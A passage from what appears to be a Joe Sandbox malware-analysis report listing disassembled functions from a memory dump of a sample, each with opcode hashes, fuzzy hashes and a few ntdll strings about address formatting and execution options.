                                                                                          • Opcode ID: 2946989e6b4846f36aa1af81d9a2ac2d233aca5b1460c032b82913d154147b25
                                                                                          • Instruction ID: 7c05caef796359b2e0949f5de18070fe0e75c4fbc416b20d933275b22c7f40cb
                                                                                          • Opcode Fuzzy Hash: 2946989e6b4846f36aa1af81d9a2ac2d233aca5b1460c032b82913d154147b25
                                                                                          • Instruction Fuzzy Hash: 00F09072500244AFC6117F14A884B9ABBEEFB94B70F464439E9457715596386D84C788
                                                                                          Function 2A0CC912 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0a49fe357bc27b6d9af541e7915e901e9cf68e64ccf30f3dc80e26f93fb65d7
                                                                                          • Instruction ID: 2257ffc446fcfe2264cd7244c5ea7a7761f86e81f80a41306ca143b475859aa8
                                                                                          • Opcode Fuzzy Hash: d0a49fe357bc27b6d9af541e7915e901e9cf68e64ccf30f3dc80e26f93fb65d7
                                                                                          • Instruction Fuzzy Hash: 10F0C270A00208EFCB04EFA9C515E9EB7B4EF18300F008065F905EB391EA38EA01CB54
                                                                                          Function 2A100115 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34106471a7f17cd31bbb90de9b12f48bbe680d5deda02db62c53e9b500ef5ea9
                                                                                          • Instruction ID: dd93cdcac49b9a717e0da25a0aae9f353301fbaabb59e9588a42376fa41c3ca8
                                                                                          • Opcode Fuzzy Hash: 34106471a7f17cd31bbb90de9b12f48bbe680d5deda02db62c53e9b500ef5ea9
                                                                                          • Instruction Fuzzy Hash: 4CF0A77755AAC44ACB117F2479A02C27B66A765234F161885CCB6E7202C97CCF83D364
                                                                                          Function 2A07CF80 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                          • Instruction ID: 01d44458292b663915c7788df337fc2e22891f7969527d5e93e19b2550f528ec
                                                                                          • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                          • Instruction Fuzzy Hash: 9CF0E23220410AEFD711AA56E940E4EFBAAEF91710F048022F9048B262D771E961CB50
                                                                                          Function 2A0D6030 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                          • Instruction ID: b6768dbacdf16959cd840cf5545cc781d2c36400773cc5d7795eb75f8514e09e
                                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                          • Instruction Fuzzy Hash: CFF03073164704AFE3219F85D940F47BBE8EB05364F42C025E6089B561D379FC40CBA4
                                                                                          Function 2A0749D0 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                          • Instruction ID: f9e7468c32ca6f271321f0a9b0268c21d5fd56a88c41c32a78f4b519305daa92
                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                          • Instruction Fuzzy Hash: E5E09232A54184BBC3212A559C00F5A77B5EBD47A0F120439E2008B161EBB2DC80D79C
                                                                                          Function 2A038E1D Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                          • Instruction ID: b2c746cb9967f184f013bfdc4ad29dc6429637cab2806c0119fcdde5b84b03ba
                                                                                          • Opcode Fuzzy Hash: c5ac96555e1ec1962fc4665ffe23dc7a07e101a6c105c12571c57001ed977efc
                                                                                          • Instruction Fuzzy Hash: 8AF08231141610EFD3317F16DD50F067BE1AF59720F014AA9E1660B8B1C760AC46EB49
                                                                                          Function 2A03EC20 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                          • Instruction ID: 690cbd67337bb506730aa4aeff3a9f2040120a4978d7cbb803c151c000e00d05
                                                                                          • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                          • Instruction Fuzzy Hash: D4F0A071160288AFEB14AB02D445F0D37D9EB01724F018639F5089A093C775E986CF04
                                                                                          Function 2A078EF5 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1288dec2f3cb41b139435694383703d65b792320a30038ca55bdc9be0cc35e18
                                                                                          • Instruction ID: da234cf5032d458ac0b607f555a2c4f96c6094b5381678318bd2922c5c03bbd2
                                                                                          • Opcode Fuzzy Hash: 1288dec2f3cb41b139435694383703d65b792320a30038ca55bdc9be0cc35e18
                                                                                          • Instruction Fuzzy Hash: 49E09B357265505BCE115F206D1476C37F66B01AF4B4610B9D844DBA01C638DCABF64C
                                                                                          Function 2A1108C0 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                          • Instruction ID: e54ffa9cacfaa6a9d316c5cde777c578fff879b05313ad400bcc23749a0f5b76
                                                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                          • Instruction Fuzzy Hash: A3E09B35E443609BC7149A29D180A93B7E8DF95674F15807DDA0457A12C231FA46D6D1
                                                                                          Function 2A0C4000 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                          • Instruction ID: 61d02579659e46929983aab09aae95ab89fbf0a4716a9c03e33c8fbf57b69f69
                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                          • Instruction Fuzzy Hash: 70E0AE343402059BD705DF19D048B6A77A6BFD5A10F25C078A9488F205EB33A8428A40
                                                                                          Function 2A038C8D Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                          • Instruction ID: c2b01383bc04c982c194cd74c5b1fbecab6fa3234fbc48324742067c6ccfbf53
                                                                                          • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                          • Instruction Fuzzy Hash: 85E08632052624EED7317F12ED04F467BE1AB54B10F0044A9E011054A1C6B49C99E64A
                                                                                          Function 2A03823B Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                          • Instruction ID: bc91cd6a928c1640db7909945d781333533c285099369bdf5917457da4b4107b
                                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                          • Instruction Fuzzy Hash: 4CE08C31481A10EFD7313E22EC00F45BBE1FB68B20F2188A9E080060A586B4AC85EB48
                                                                                          Function 2A078A90 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                          • Instruction ID: e38db4a15f560c11a7a25b0f21718a3ec6dcce69a9b0d88d3a9f8abc96481378
                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                          • Instruction Fuzzy Hash: B0E08633511A1497C724EE14D911B7677F4EF45720F05463EA61347780C534E548C79C
                                                                                          Function 2A042050 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 196006fb2f8032b1655f37afb0f7bfd1dd55b82c03c352234a1f0ec2b0d8c983
                                                                                          • Instruction ID: 5f0c05430545298a1e8da145ea39f023eee1d9d3a9572a34d12285b047a0b45a
                                                                                          • Opcode Fuzzy Hash: 196006fb2f8032b1655f37afb0f7bfd1dd55b82c03c352234a1f0ec2b0d8c983
                                                                                          • Instruction Fuzzy Hash: FAE08C32240454ABC312FE5DDD10E4A779AEFA92A0F004121F15097291CA24AC00C7A4
                                                                                          Function 2A096AA4 Relevance: .0, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                          • Instruction ID: 1a3db7c7b0b747fa09461c354285f858e5c580d67ffcb0d4a974d59cc1198566
                                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                          • Instruction Fuzzy Hash: 2DD05E36511A50AFC3329F1BEA00C53BBF9FBC5F10B06067EE54583920C670A806EBA0
                                                                                          Function 2A0F6ED0 Relevance: .0, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                          • Instruction ID: 57b2043be8a64bc0dffcb3153a9637618b599f647cec42cf3275a98cfd3f5194
                                                                                          • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                          • Instruction Fuzzy Hash: D2D02E2A04C2C483C6226988A070BAA3F2E4742E04F28247CE0448FA07CE174883E22A
                                                                                          Function 2A0BE908 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                          • Instruction ID: 17622d4483530ad8c61886115c021a2193a40527fc820d573ec08addb10a6d4f
                                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                          • Instruction Fuzzy Hash: F0E0EC35950684AFCF12EF55D640F5AB7F5FB95B40F1504A8E1085B661C624E900CB40
                                                                                          Function 2A03A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                          • Instruction ID: 5970bf0b37861484181fc7dc64ad117ec50112c1a583d7972c2a0f68015222e8
                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                          • Instruction Fuzzy Hash: EAD01232216070ABCB29A6566914F576B55AB81A94F16017D750993900C5168C82D6E0
                                                                                          Function 2A07CA24 Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e4c9db96069a22703ffb4937d6ae98865e839ca628e0b5b592ae251e8bb8a0a6
                                                                                          • Instruction ID: d03f12c367e5b6c96fcace86eb0b8ca49796b4ab9b035de8321a34eca60ed2d1
                                                                                          • Opcode Fuzzy Hash: e4c9db96069a22703ffb4937d6ae98865e839ca628e0b5b592ae251e8bb8a0a6
                                                                                          • Instruction Fuzzy Hash: 8AD0A930641841EBEF0AFF24CA24EAE3FB0FB20681B4000B8E700A2030E339CC01DA18
                                                                                          Function 2A07A830 Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                          • Instruction ID: 6682dd786bee6f988ffb520947b0165976ab6ece301ada6c22b40217d847e95c
                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                          • Instruction Fuzzy Hash: B7D012371D054CBBCB119F65DC01F957FA9E765BA0F444020F504875A1C63AE950D684
                                                                                          Function 2A07CF50 Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a29d9f456fd1fbda7534c3aa0c19dd77565bc1c12158bcc1c2932aaa2c953c25
                                                                                          • Instruction ID: 10b904fae2d372a0121a5f11ddccb5e288f502f2ef4160f39862b2901ae7692f
                                                                                          • Opcode Fuzzy Hash: a29d9f456fd1fbda7534c3aa0c19dd77565bc1c12158bcc1c2932aaa2c953c25
                                                                                          • Instruction Fuzzy Hash: 9AD0A972280248ABC702FF09CD40F067BAAFBB8790F000020F40887222CA30EC60DAA8
                                                                                          Function 2A07CF1F Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 96182fe698ab072ab0f1111d6830d50b8bea518766ce6392172be65c7cc5ca5b
                                                                                          • Instruction ID: 4c53ada9bdf9a33d7c2abf0089b882526a71c0656b8c4b98bd9431ad3f7394a1
                                                                                          • Opcode Fuzzy Hash: 96182fe698ab072ab0f1111d6830d50b8bea518766ce6392172be65c7cc5ca5b
                                                                                          • Instruction Fuzzy Hash: 59D05E72151440DFE72ADB04CD46F2677E4F710704F4540B8A005CB921C328E910DB44
                                                                                          Function 2A0502A0 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                          • Instruction ID: 191b45cacef45ea3c3a40dc71018aba6a9489577aafeffe01fc22b587e0dc9a8
                                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                          • Instruction Fuzzy Hash: DAD0C939312E80CFC356DF48C5A0F0973E4BB44B84F8204A0E501CBB22D66CD940CA00
                                                                                          Function 2A060310 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction ID: f4ff61572c25e6e50afa504f416a60a628b0635907557525ce1a5ad0c4788b44
                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction Fuzzy Hash: B2D01236140288EFCB05DF41C890D9A772AFBD8B10F108019FD19076118A31ED62DA50
                                                                                          Function 2A0F6F00 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                          • Instruction ID: 8621b7737b23e59191bedf0f23195d78dbfb4973f26fdb172f67b5bd4b63cc45
                                                                                          • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                          • Instruction Fuzzy Hash: 37C02B2F0152C089CD038F3013123C0BFA0C7034C4F0C08C1D0C11F113C0144223D625
                                                                                          Function 2A114DAD Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                          • Instruction ID: c3671a496b4f20f668c616e1409853b741e6338ada89b98384268e0f7e0822eb
                                                                                          • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                          • Instruction Fuzzy Hash: 29B01232252545DFC7026720CB00B1872A9BF09BC0F0900F0E50089831D6188910E501
                                                                                          Function 2A082890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          • API String ID: 48624451-2108815105
                                                                                          • Opcode ID: 0cace762e27a27a23cc7e2ee2164dcad0ac565f298466063d024fd4be99e0550
                                                                                          • Instruction ID: 1e8b7fc05d629217f462579ec19618ff582de684926e88b09f63674ff747fcbb
                                                                                          • Opcode Fuzzy Hash: 0cace762e27a27a23cc7e2ee2164dcad0ac565f298466063d024fd4be99e0550
                                                                                          • Instruction Fuzzy Hash: 3951E6F1A00116BFCB10EF9989D097EFBF8BB4C200B108279E5A5D7642D274DF509BA4
                                                                                          Function 2A0F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                          • API String ID: 48624451-2108815105
                                                                                          • Opcode ID: 97b3b89e01572e9c21fc59e42edc40b7bc5294d29bd50493c3f1c265e0f15762
                                                                                          • Instruction ID: 7718ed4e8646daf19663ae49b037bc3a1dece4e15648b99bb386735f5647c013
                                                                                          • Opcode Fuzzy Hash: 97b3b89e01572e9c21fc59e42edc40b7bc5294d29bd50493c3f1c265e0f15762
                                                                                          • Instruction Fuzzy Hash: 7C511875A04645AFCB60EF5CC89097FFBF8AB4C600B408869E595E7642DAB4EB40D7A0
                                                                                          Function 2A077630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • ExecuteOptions, xrefs: 2A0B46A0
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 2A0B46FC
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 2A0B4787
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 2A0B4725
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 2A0B4655
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 2A0B4742
                                                                                          • Execute=1, xrefs: 2A0B4713
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
